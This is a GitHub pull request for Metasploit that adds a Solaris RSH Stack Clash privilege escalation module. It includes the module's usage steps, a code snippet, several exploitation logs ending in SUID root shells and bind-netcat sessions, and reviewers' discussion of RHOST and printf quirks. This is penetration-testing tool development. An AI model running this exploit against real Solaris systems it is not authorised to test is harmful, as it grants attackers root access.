New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Solaris RSH Stack Clash Privilege Escalation module #10668

Merged
merged 1 commit into from Oct 14, 2018

Conversation

Projects
None yet
3 participants
@bcoles
Copy link
Contributor

bcoles commented Sep 18, 2018

Add Solaris RSH Stack Clash Privilege Escalation module.

    This module exploits a vulnerability in RSH on unpatched Solaris
    systems which allows users to gain root privileges.

    The stack guard page on unpatched Solaris systems is of
    insufficient size to prevent collisions between the stack
    and heap memory, aka Stack Clash.

    This module uploads and executes Qualys' Solaris_rsh.c exploit,
    which exploits a vulnerability in RSH to bypass the stack guard
    page to write to the stack and create a SUID root shell.

    This module has offsets for Solaris versions 11.1 (x86) and
    Solaris 11.3 (x86).

    Exploitation will usually complete within a few minutes using
    the default number of worker threads (10). Occasionally,
    exploitation will fail. If the target system is vulnerable,
    usually re-running the exploit will be successful.

    This module has been tested successfully on Solaris 11.1 (x86)
    and Solaris 11.3 (x86).

Unfortunately, this module must make use of unix/cmd payloads, due to #9498.

Verification

  • Start msfconsole
  • Get a session
  • use exploit/solaris/local/rsh_stack_clash_priv_esc
  • set SESSION [SESSION]
  • run
  • You should get a new root session

Output

  msf5 > use exploit/solaris/local/rsh_stack_clash_priv_esc
  msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > set session 1
  session => 1
  msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > set rhost 172.16.191.221
  rhost => 172.16.191.221
  msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > run
  [!] SESSION may not be compatible with this module.
  [*] Using target: Solaris 11.3
  [*] Writing '/tmp/.2yZgv2XkEj/.KJqSwhpguh.c' (10297 bytes) ...
  [*] Symlinking /tmp/.2yZgv2XkEj/.KJqSwhpguh to /tmp/.2yZgv2XkEj/ROOT
  [*] Creating suid root shell. This may take a while...
  [*] Completed in 324.21s
  [+] suid root shell created: /tmp/.2yZgv2XkEj/ROOT
  [*] Writing '/tmp/.2yZgv2XkEj/.bWjzWVllCB' (109 bytes) ...
  [*] Executing payload...
  [*] Started bind TCP handler against 172.16.191.221:4444
  [+] Deleted /tmp/.2yZgv2XkEj/.KJqSwhpguh.c
  [+] Deleted /tmp/.2yZgv2XkEj/.KJqSwhpguh
  [!] Tried to delete /tmp/.2yZgv2XkEj/ROOT, unknown result
  [+] Deleted /tmp/.2yZgv2XkEj/.bWjzWVllCB
  [+] Deleted /tmp/.2yZgv2XkEj
  id
  uid=0(root) gid=0(root) groups=10(staff)
  uname -a
  SunOS solaris 5.11 11.3 i86pc i386 i86pc
  cat /etc/release
                               Oracle Solaris 11.3 X86
    Copyright (c) 1983, 2015, Oracle and/or its affiliates.  All rights reserved.
                              Assembled 06 October 2015

@h00die h00die referenced this pull request Sep 19, 2018

Open

Solaris LPEs #10583

4 of 8 tasks complete

@h00die h00die self-assigned this Sep 26, 2018

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Sep 29, 2018

Payload options (cmd/unix/bind_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST                   no        The target address

So, um, why is rhost not required???? I think this is more of an underlying framework thing, but if you don't fill it out, it doesn't know where to connect. Is this some voodoo where if its an exploit module (other than /local/) the rhost is assumed from the module's rhost? Could explain it, but when you try to exploit a /local/ module, it doesn't error.
This could also be a script kiddie check (that i failed obvi)

11.3 w/ no rhost set (failure, as expected)

msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > sessions -i 1
[*] Starting interaction with 1...

Oracle Corporation	SunOS 5.11	11.3	September 2015
uname -a
id
SunOS solaris11.3 5.11 11.3 i86pc i386 i86pc
uid=100(solaris) gid=10(staff)
^Z
Background session 1? [y/N]  y
msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > exploit

[!] SESSION may not be compatible with this module.
[+] /usr/bin/rsh is setuid
[+] gcc is installed
[+] Solaris version 11.3 appears to be vulnerable
[*] Using target: Solaris 11.3
[*] Creating '/tmp/.iZEFSKULH' directory
[*] Writing '/tmp/.iZEFSKULH/.0mTFSt5QqH.c' (10297 bytes) ...
[*] Max line length is 262145
[*] /usr/bin/printf '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "printf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\n\x00\xFF\xFEABCD\x7F%%\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
[*] Writing 10297 bytes in 1 chunks of 36168 bytes (octal-encoded), using printf
[*] Symlinking /tmp/.iZEFSKULH/.0mTFSt5QqH to /tmp/.iZEFSKULH/ROOT
[*] Creating suid root shell. This may take a while...
[*] Completed in 32.31s
[+] suid root shell created: /tmp/.iZEFSKULH/ROOT
[*] Writing '/tmp/.iZEFSKULH/.ba5WAL5L' (105 bytes) ...
[*] Max line length is 262145
[*] /usr/bin/printf '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "printf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\n\x00\xFF\xFEABCD\x7F%%\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
[*] Writing 105 bytes in 1 chunks of 374 bytes (octal-encoded), using printf
[*] Executing payload...
[*] Started bind TCP handler against :4444
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[-] The connection was refused by the remote host (:4444).
[!] Attempting to delete working directory /tmp/.iZEFSKULH
[*] Exploit completed, but no session was created.
msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > sessions -i 1
[*] Starting interaction with 1...

netstat -an


TCP: IPv4
   Local Address        Remote Address     Swind  Send-Q  Rwind  Recv-Q    State
-------------------- -------------------- ------- ------ ------- ------ -----------
127.0.0.1.5999             *.*                  0      0  128000      0 LISTEN
127.0.0.1.4999             *.*                  0      0  128000      0 LISTEN
      *.111                *.*                  0      0  128000      0 LISTEN
      *.*                  *.*                  0      0  128000      0 IDLE
      *.111                *.*                  0      0  128000      0 LISTEN
      *.*                  *.*                  0      0  128000      0 IDLE
      *.22                 *.*                  0      0  128000      0 LISTEN
      *.22                 *.*                  0      0  128000      0 LISTEN
127.0.0.1.25               *.*                  0      0  128000      0 LISTEN
127.0.0.1.587              *.*                  0      0  128000      0 LISTEN
127.0.0.1.631              *.*                  0      0  128000      0 LISTEN
      *.121                *.*                  0      0  128000      0 LISTEN
      *.121                *.*                  0      0  128000      0 LISTEN
      *.53539              *.*                  0      0  128000      0 LISTEN
127.0.0.1.50015            *.*                  0      0  128000      0 LISTEN
127.0.0.1.33603            *.*                  0      0  128000      0 LISTEN
127.0.0.1.54740            *.*                  0      0  128000      0 LISTEN
127.0.0.1.36468            *.*                  0      0  128000      0 LISTEN
127.0.0.1.53682            *.*                  0      0  128000      0 LISTEN
127.0.0.1.52462            *.*                  0      0  128000      0 LISTEN
127.0.0.1.43476            *.*                  0      0  128000      0 LISTEN
127.0.0.1.54135            *.*                  0      0  128000      0 LISTEN
2.2.2.2.22      1.1.1.1.40755    60416      0  128872     52 ESTABLISHED
      *.4444               *.*                  0      0  128000      0 LISTEN
@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Sep 29, 2018

@h00die that has been an issue for a loooong time. RHOST is required.

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Sep 29, 2018

11.3 success (after setting rhost)

msf5 exploit(solaris/local/rsh_stack_clash_priv_esc) > exploit

[!] SESSION may not be compatible with this module.
[+] /usr/bin/rsh is setuid
[+] gcc is installed
[+] Solaris version 11.3 appears to be vulnerable
[*] Using target: Solaris 11.3
[*] Creating '/tmp/.rHzBLwmROl' directory
[*] Writing '/tmp/.rHzBLwmROl/.HLvXWZnXBvz.c' (10297 bytes) ...
[*] Max line length is 262145
[*] /usr/bin/printf '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "printf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\n\x00\xFF\xFEABCD\x7F%%\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
[*] Writing 10297 bytes in 1 chunks of 36168 bytes (octal-encoded), using printf
[*] Symlinking /tmp/.rHzBLwmROl/.HLvXWZnXBvz to /tmp/.rHzBLwmROl/ROOT
[*] Creating suid root shell. This may take a while...
[*] Completed in 136.99s
[+] suid root shell created: /tmp/.rHzBLwmROl/ROOT
[*] Writing '/tmp/.rHzBLwmROl/.77znv2mEhI' (109 bytes) ...
[*] Max line length is 262145
[*] /usr/bin/printf '\0\377\376\101\102\103\104\177\45\45\15\12' Failed: "printf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\nprintf: Illegal byte sequence\n\x00\xFF\xFEABCD\x7F%%\r\n" != "\x00\xFF\xFEABCD\x7F%%\r\n"
[*] Writing 109 bytes in 1 chunks of 390 bytes (octal-encoded), using printf
[*] Executing payload...
[*] Started bind TCP handler against 2.2.2.2:8989
[*] Command shell session 2 opened (1.1.1.1:40009 -> 2.2.2.2:8989) at 2018-09-29 15:26:30 -0400
[+] Deleted /tmp/.rHzBLwmROl/.HLvXWZnXBvz.c
[+] Deleted /tmp/.rHzBLwmROl/.HLvXWZnXBvz
[!] Tried to delete /tmp/.rHzBLwmROl/ROOT, unknown result
[+] Deleted /tmp/.rHzBLwmROl/.77znv2mEhI
[!] Attempting to delete working directory /tmp/.rHzBLwmROl
[-] Unable to delete /tmp/.rHzBLwmROl
[!] Attempting to delete working directory /tmp/.rHzBLwmROl

id
uid=0(root) gid=0(root) groups=10(staff)
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Sep 29, 2018

for continuity, i'm using a ssh_login initial shell. I've been getting those printf warnings on my modules im working on as well on the 11.3 box, however, the code ive checked passes a diff so it seems to be inconsequential

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Sep 29, 2018

@h00die yeah I've seen the printf errors on a bunch of modules - not just local modules - but never seemed to cause any problems.

print_status "Creating suid root shell. This may take a while..."
cmd_exec "cd #{base_path}"
start = Time.now
output = cmd_exec "./#{exploit_name} #{arg}", nil, 1_800

This comment has been minimized.

@h00die

h00die Oct 13, 2018

Contributor

1_800?

irb(main):001:0> 1_800
=> 1800

I'm not a ruby person, but wanted to check on this timeout value, is it supposed to be 1800 or do you have something new to teach me on ruby? Wouldn't be the ... 10th time you taught me a new trick!

This comment has been minimized.

@bcoles

bcoles Oct 14, 2018

Contributor

1_800 is correct. It's 1800 seconds timeout.

On a modest VM (IIRC: 1GB RAM, 1 CPU core) under no load, an exploitation attempt should either succeed or fail within half an hour (1800 seconds) - usually much quicker.

Ruby natively supports using _ within numbers, which is useful for formatting large numbers for readability. It's typically used as a thousands-separator, but can also be used stupidly:

2.3.0 :001 > 1_2.3_4
 => 12.34 
2.3.0 :002 > 

This comment has been minimized.

@h00die

h00die Oct 14, 2018

Contributor

Looks like theres a PEP for python, it just hasn't gotten there yet.

Thanks for the details, that is a neat/nice way to show bigger numbers and not have to count zeroes

@h00die h00die merged commit 4fb223b into rapid7:master Oct 14, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

h00die added a commit that referenced this pull request Oct 14, 2018

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Oct 14, 2018

Release Notes

The exploit/solaris/local/rsh_stack_clash_priv_esc module has been added to the framework. It allows you to gain root privileges by exploiting a vulnerability in RSH on Solaris 11.1 and 11.3.

msjenkins-r7 added a commit that referenced this pull request Oct 14, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment